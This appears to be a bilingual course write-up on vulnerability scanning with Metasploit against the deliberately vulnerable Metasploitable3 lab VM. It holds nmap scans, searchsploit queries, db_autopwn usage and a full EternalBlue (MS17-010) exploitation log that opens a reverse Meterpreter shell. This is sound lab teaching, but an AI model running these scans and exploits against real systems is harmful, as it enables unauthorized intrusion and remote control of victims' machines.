Vulnerability Scanning With MSF
Vulnerability Scanning
Vulnerability scanning & detection is the process of scanning a target for vulnerabilities and verifying whether they can be exploited.
So far, we have been able to identify and exploit misconfigurations on target systems, however, in this section we will be exploring the process of utilizing auxiliary and exploit modules to scan and identify inherent vulnerabilities in services, operating systems and web applications.
This information will come in handy during the exploitation phase of this course.
We will also be exploring the process of utilizing third party vulnerabilities scanning tools like Nessus and how we can integrate Nessus functionality in to the MSF.
使用 MSF 进行漏洞扫描
漏洞扫描
漏洞扫描和检测是扫描目标漏洞并验证它们是否可以被利用的过程。
到目前为止,我们已经能够识别和利用目标系统上的错误配置,但是,在本节中,我们将探索利用辅助和利用模块来扫描和识别服务、操作系统和 Web 应用程序中的固有漏洞的过程。
这些信息将在本课程的利用阶段派上用场。
我们还将探索使用 Nessus 等第三方漏洞扫描工具的过程,以及我们如何将 Nessus 功能集成到 MSF 中。
Lab Environment
For the purposes of demonstrating the vulnerability scanning process, we will be utilizing an intentionally vulnerable virtual machine called Metasploitable3 that is based on Windows Server 2008.
Metasploitable3 was developed by Rapid7 to demonstrate how MSF can be used to perform exploitation of a Windows System.
Instruction on how this VM can be setup can be found here: https://bit.ly/3kASwns
实验室环境
为了演示漏洞扫描过程,我们将使用一个名为 Metasploitable3 的故意易受攻击的虚拟机,该虚拟机基于 Windows Server 2008。
Metasploitable3 由 Rapid7 开发,用于演示如何使用 MSF 执行 Windows 系统的利用。
可以在此处找到有关如何设置此 VM 的说明:https://bit.ly/3kASwns
Video
Detect active hosts on my network:
-sn: Perform a quick ping.
1
2
3
sudo nmap -sn 10.10.10.1/24
ip a s
eth0: 10.10.10.5/24
The target IP is 10.10.10.4.
Ensure that the PostgreSQL database service is started.
1
msfconsole
Verify that the database is connected.
1
db_status
Set global variables for the RHOSTS, RHOST.
1
2
setg RHOSTS 10.10.10.4
setg RHOST 10.10.10.4
Service Version.
db_nmap: this will allow us to perform an Nmap scan within the Metasploit Framework console, and it will automatically import the results into the Metasploit Framework database.
Set up a workspace here that will help us sort out all of our results and all of our hosts rather and keep them organized.
1
workspace -a MS3
-sS: Perform a SYN scan.
-sV: Perform service version detection.
-O: Perform operating system detection.
All the results or rather the results of Nmap scan will be added to the Metasploit Framework database, so that we can refer back to them whenever we want.
1
db_nmap -sS -sV -O 10.10.10.4
1
hosts
Display all the services and the respective open ports.
1
services
How do we utilize this particular service information to find and identify vulnerabilities?
The first thing we can do is just utilize the exact service version or I can search for exploits.
1
2
3
search type:exploit name:Microsoft IIS
search type:exploit name:MySQL 5.5
search Sun GlassFish
How do we check as to whether this particular exploit module will work on the open source version of GlassFish 4.0?
1
2
3
4
use exploit/multi/http/glassfish_deployer
info
set payload windows/meterpreter/reverse_tcp
show options
What values we need to change.
1
services
This is how you would identify an exploit module through the service version. This is just manual vulnerability scanning.
1
back
Explore the services page
1
services
The SMB exploit for Windows Server 2008 R2.
Utilize the MSFconsole search utility. Alternatively, we can also use an inbuilt utility that’s part of Kali Linux called searchsploit. Searchsploit is a command line utility that allows your to search the ExploitDB database for exploits and we can then limit the results to only show Metasploit exploits.
searchsploit will bring up exploits or exploit code that is not available within the MSFconsole, and it will also display MSF modules. So we want to limit the results to only display the MSF exploit modules.
We’ll try and find exploits for Microsoft Windows SMB.
1
searchsploit "Microsoft Windows SMB"
The way to distinguish the standard exploit code from the Metasploit modules is you’ll see that right beside the name here, there will be a bracket with the name Metasploit within it i.e. (Metasploit). That means that there is a Metasploit module available for this particular exploit.
Let’s limit it to only the Metasploit modules. Pipe out the content. Use the expressions filter to make sure that we are case sensitive.
1
searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
Take a look at this particular exploit, this works on Windows 2008 R2.
1
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
The MSF already has a module for this particular exploit.
1
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)
1
search eternalblue
1
2
3
use auxiliary/scanner/smb/smb_ms17_010
show options
run
1
2
3
4
5
use exploit/windows/smb/ms17_010_eternalblue
show options
run
meterpreter > sysinfo
meterpreter > exit
The next technique that I want to highlight is the db_autopwn plugin. This is an extremely useful plugin for the MSF.
It is utilized to identify exploit modules for the ports that are currently open on a target system. And the way it does this is takes a look at your database and the services that are currently running or that are currently open on the target systems that you’ve scanned, and then it provides you with a list of exploit modules that you can use for each of those services.
1
2
3
4
cd Downloads/
wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
ls
sudo mv db_autopwn.rb /usr/share/metasploit-framework/plugins
1
2
load db_autopwn
db_autopwn
This interacts directly with the MSF database, and will only work if your scans or your service information is already within the MSF database. So I really recommand that you start enumerating all of the information, so that it’s stored within the database, and you can do that either through Nmap or through the auxiliary modules.
1
2
-p Select modules based on open ports
-t Show all matching exploit modules
1
2
-p 根据开放端口选择模块
-t 显示所有匹配的利用模块
If we just run it as is, you’ll see that it’ll actually enumerate quite a lot of modules. It’s enumerating exploits for each of the open ports. It’s not specific because it’s not utilizing the service version.
In order to make this more streamlined or to narrow down our search, we can target specific ports or specific services.
1
db_autopwn -p -t
-PI: allows us to specify the port range that we want to perform the scan for. Target the SMB port which is port 445.
1
2
-PI [range] Only exploit hosts with these ports open
-PI [range] 仅利用打开这些端口的主机
1
db_autopwn -p -t -PI 445
However, it’s also providing us with exploit modules for Samba, which is the Linux equivalent of SMB. While in our case, we are targeting a Windows box.
However, it also provide us with all the SMB exploits for Windows. The next step would be to perform more research about the target operating system and what vulnerabilities that specific version of SMB suffers from, and then finding the appropriate exploit module to use.
And in our case, we know that EternalBlue exploit does work.
This can be very helpful when trying to limit your search for exploits or to perform vulnerabilities scanning with the MSF.
You can also limit the port to port 21.
1
db_autopwn -p -t -PI 21
What we can do finally is we can make use of the analyze command.
analyze command will analyze the contents of the MSF database, so your hosts and services, and then will provide you with a list of vulnerabilities that those particular services suffer from or that can be exploited.
1
analyze
vulns: it’s been able to detect a vulnerability for SMB.
1
vulns
This is how to perform vulnerability scanning with the MSF and how to utilize the various auxiliary and exploit modules to test whether a particular service is vulnerable to an exploit or not.
1
2
services
searchsploit "Apache Tomcat/Coyote JSP engine 1.1"
Home Lab
Environment: Windows Server 2008 R2
1
2
3
4
5
6
┌──(root㉿kali)-[~]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.248.148 netmask 255.255.255.0 broadcast 192.168.248.255
inet6 fe80::20c:29ff:feaf:2b2a prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:af:2b:2a txqueuelen 1000 (Ethernet)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.248.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 08:12 EST
Nmap scan report for 192.168.248.1
Host is up (0.00039s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.248.2
Host is up (0.00011s latency).
MAC Address: 00:50:56:FF:AC:04 (VMware)
Nmap scan report for 192.168.248.133
Host is up (0.00035s latency).
MAC Address: 00:0C:29:F7:9E:3F (VMware)
Nmap scan report for 192.168.248.254
Host is up (0.000086s latency).
MAC Address: 00:50:56:E5:CA:A0 (VMware)
Nmap scan report for 192.168.248.148
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.95 seconds
Target: 192.168.248.133
1
2
3
4
5
6
7
┌──(root㉿kali)-[~]
└─# service postgresql start
┌──(root㉿kali)-[~]
└─# msfconsole -q
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
1
2
3
4
msf6 > setg RHOSTS 192.168.248.133
RHOSTS => 192.168.248.133
msf6 > setg RHOST 192.168.248.133
RHOST => 192.168.248.133
1
2
3
msf6 > workspace -a MSF3
[*] Added workspace: MSF3
[*] Workspace: MSF3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf6 > db_nmap -sS -sV -O 192.168.248.133
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 08:18 EST
[*] Nmap: Nmap scan report for 192.168.248.133
[*] Nmap: Host is up (0.00033s latency).
[*] Nmap: Not shown: 989 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
[*] Nmap: 3389/tcp open tcpwrapped
[*] Nmap: 49152/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49153/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49154/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49155/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49156/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49157/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 49158/tcp open msrpc Microsoft Windows RPC
[*] Nmap: MAC Address: 00:0C:29:F7:9E:3F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows 7|2008|8.1
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
[*] Nmap: OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 85.44 seconds
1
2
3
4
5
6
7
8
9
msf6 > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.248.133 00:0c:29:f7:9e:3f Windows 7 client
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf6 > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.248.133 135 tcp msrpc open Microsoft Windows RPC
192.168.248.133 139 tcp netbios-ssn open Microsoft Windows netbios-ssn
192.168.248.133 445 tcp microsoft-ds open Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
192.168.248.133 3389 tcp tcpwrapped open
192.168.248.133 49152 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49153 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49154 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49155 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49156 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49157 tcp msrpc open Microsoft Windows RPC
192.168.248.133 49158 tcp msrpc open Microsoft Windows RPC
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
┌──(root㉿kali)-[~]
└─# searchsploit "Microsoft Windows SMB"
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft - SMB Server Trans2 Zero Size Pool Alloc (MS10-054) | windows/dos/14607.py
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit) | windows/remote/16366.rb
Microsoft SMB Driver - Local Denial of Service | windows/dos/28001.c
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - 'SMB' Transaction Response Handling (MS05-011) | windows/dos/1065.c
Microsoft Windows - 'SMBGhost' Remote Code Execution | windows/remote/48537.py
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) | windows/remote/40280.py
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) | windows/remote/14674.txt
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) | windows/remote/16363.rb
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) | windows/dos/6463.rb
Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137) | windows/dos/40744.txt
Microsoft Windows - SMB Client-Side Bug (PoC) (MS10-006) | windows/dos/12258.py
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit) | windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service | windows/dos/12524.py
Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068) | windows/remote/7125.txt
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC) | windows/dos/48216.md
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation | windows/local/48267.txt
Microsoft Windows 10 - SMBv3 Tree Connect (PoC) | windows/dos/41222.py
Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation | windows/local/47115.txt
Microsoft Windows 2000/XP - SMB Authentication Remote Overflow | windows/remote/20.txt
Microsoft Windows 2003 SP2 - 'ERRATICGOPHER' SMB Remote Code Execution | windows/remote/41929.py
Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution | windows/remote/44616.py
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC) | windows/dos/12273.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8.1/2012 R2 - SMBv3 Null Pointer Dereference Denial of Service | windows/dos/44189.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows 95/Windows for Workgroups - 'smbclient' Directory Traversal | windows/remote/20371.txt
Microsoft Windows NT 4.0 SP5 / Terminal Server 4.0 - 'Pass the Hash' with Modified SMB Client | windows/remote/19197.txt
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation | windows/dos/43517.txt
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063) | windows/dos/9594.txt
Microsoft Windows XP/2000 - 'Mrxsmb.sys' Local Privilege Escalation (MS06-030) | windows/local/1911.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1) | windows/dos/21746.c
Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2) | windows/dos/21747.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
1
2
3
4
5
6
7
8
9
┌──(root㉿kali)-[~]
└─# searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
Microsoft DNS RPC Service - 'extractQuotedChar()' Remote Overflow 'SMB' (MS07-029) (Metasploit) | windows/remote/16366.rb
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) | windows/remote/16363.rb
Microsoft Windows - 'WRITE_ANDX' SMB Command Handling Kernel Denial of Service (Metasploit) | windows/dos/6463.rb
Microsoft Windows - SMB Relay Code Execution (MS08-068) (Metasploit) | windows/remote/16360.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
1
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
1
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf6 > search EternalBlue
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
4 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
1
2
3
4
5
6
7
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 192.168.248.133:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.248.148:4444
[*] 192.168.248.133:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.248.133:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7600 x64 (64-bit)
[*] 192.168.248.133:445 - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.248.133:445 - The target is vulnerable.
[*] 192.168.248.133:445 - Connecting to target for exploitation.
[+] 192.168.248.133:445 - Connection established for exploitation.
[+] 192.168.248.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.248.133:445 - CORE raw buffer dump (36 bytes)
[*] 192.168.248.133:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
[*] 192.168.248.133:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
[*] 192.168.248.133:445 - 0x00000020 37 36 30 30 7600
[+] 192.168.248.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.248.133:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.248.133:445 - Sending all but last fragment of exploit packet
[*] 192.168.248.133:445 - Starting non-paged pool grooming
[+] 192.168.248.133:445 - Sending SMBv2 buffers
[+] 192.168.248.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.248.133:445 - Sending final SMBv2 buffers.
[*] 192.168.248.133:445 - Sending last fragment of exploit packet!
[*] 192.168.248.133:445 - Receiving response from exploit packet
[+] 192.168.248.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.248.133:445 - Sending egg to corrupted connection.
[*] 192.168.248.133:445 - Triggering free of corrupted buffer.
[*] Sending stage (200774 bytes) to 192.168.248.133
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.248.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.248.148:4444 -> 192.168.248.133:49170) at 2023-01-08 08:40:10 -0500
meterpreter > sysinfo
Computer : WIN-4QCPUB6FIVL
OS : Windows 2008 R2 (6.1 Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.248.133 - Meterpreter session 1 closed. Reason: User exit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
msf6 exploit(windows/smb/ms17_010_eternalblue) > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf6 exploit(windows/smb/ms17_010_eternalblue) > db_autopwn
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[*] 用法:db_autopwn [选项]
-h 显示此帮助文本
-t 显示所有匹配的利用模块
-x 根据漏洞参考选择模块
-p 根据开放端口选择模块
-e 对所有匹配的目标发起攻击
-r 使用反向连接shell
-b 在随机端口上使用绑定 shell(默认)
-q 禁用漏洞利用模块输出
-R [rank] 只运行最低等级的模块
-I [range] 只利用这个范围内的主机
-X [range] 始终排除此范围内的主机
-PI [range] 仅利用打开这些端口的主机
-PX [range] 始终排除打开这些端口的主机
-m [regex] 只运行名称与正则表达式匹配的模块
-T [secs] 以秒为单位的任何漏洞利用的最大运行时间
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
msf6 exploit(windows/smb/ms17_010_eternalblue) > db_autopwn -p -t -PI 445
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[*] Analysis completed in 16 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] 192.168.248.133:445 exploit/freebsd/samba/trans2open (port match)
[*] 192.168.248.133:445 exploit/linux/samba/chain_reply (port match)
[*] 192.168.248.133:445 exploit/linux/samba/is_known_pipename (port match)
[*] 192.168.248.133:445 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.248.133:445 exploit/linux/samba/setinfopolicy_heap (port match)
[*] 192.168.248.133:445 exploit/linux/samba/trans2open (port match)
[*] 192.168.248.133:445 exploit/multi/samba/nttrans (port match)
[*] 192.168.248.133:445 exploit/multi/samba/usermap_script (port match)
[*] 192.168.248.133:445 exploit/netware/smb/lsass_cifs (port match)
[*] 192.168.248.133:445 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.248.133:445 exploit/solaris/samba/trans2open (port match)
[*] 192.168.248.133:445 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.248.133:445 exploit/windows/brightstor/etrust_itm_alert (port match)
[*] 192.168.248.133:445 exploit/windows/dcerpc/cve_2021_1675_printnightmare (port match)
[*] 192.168.248.133:445 exploit/windows/smb/cve_2020_0796_smbghost (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ipass_pipe_exec (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms03_049_netapi (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms04_011_lsass (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms04_031_netdde (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms05_039_pnp (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms06_040_netapi (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms06_066_nwapi (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms06_066_nwwks (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms06_070_wkssvc (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms07_029_msdns_zonename (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms08_067_netapi (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms10_061_spoolss (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms17_010_eternalblue (port match)
[*] 192.168.248.133:445 exploit/windows/smb/ms17_010_psexec (port match)
[*] 192.168.248.133:445 exploit/windows/smb/psexec (port match)
[*] 192.168.248.133:445 exploit/windows/smb/smb_doublepulsar_rce (port match)
[*] 192.168.248.133:445 exploit/windows/smb/smb_relay (port match)
[*] 192.168.248.133:445 exploit/windows/smb/smb_rras_erraticgopher (port match)
[*] 192.168.248.133:445 exploit/windows/smb/timbuktu_plughntcommand_bof (port match)
[*] ================================================================================
[*]
[*]
1
[*] 192.168.248.133:445 exploit/windows/smb/ms17_010_eternalblue (port match)
1
2
3
4
5
msf6 exploit(windows/smb/ms17_010_eternalblue) > analyze
[*] Analysis for 192.168.248.133 ->
[*] exploit/windows/smb/ms17_010_eternalblue - ready for testing
[*] exploit/windows/smb/ms17_010_psexec - credentials are required
[*] exploit/windows/smb/smb_doublepulsar_rce - ready for testing
1
2
3
4
5
6
7
8
9
10
11
12
msf6 exploit(windows/smb/ms17_010_eternalblue) > vulns
Vulnerabilities
===============
Timestamp Host Name References
--------- ---- ---- ----------
2023-01-08 13:38:28 UTC 192.168.248.133 MS17-010 SMB RCE Detection CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148,MSB-MS17-010,URL-https://zerosum0
x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html,URL-https://github.com/countercept/doublepulsar-d
etection-script,URL-https://web.archive.org/web/20170513050203/https://technet.microsoft.com/en-us/library/security/m
s17-010.aspx,URL-https://github.com/RiskSense-Ops/MS17-010,URL-https://risksense.com/wp-content/uploads/2018/05/White
-Paper_Eternal-Blue.pdf,EDB-42030
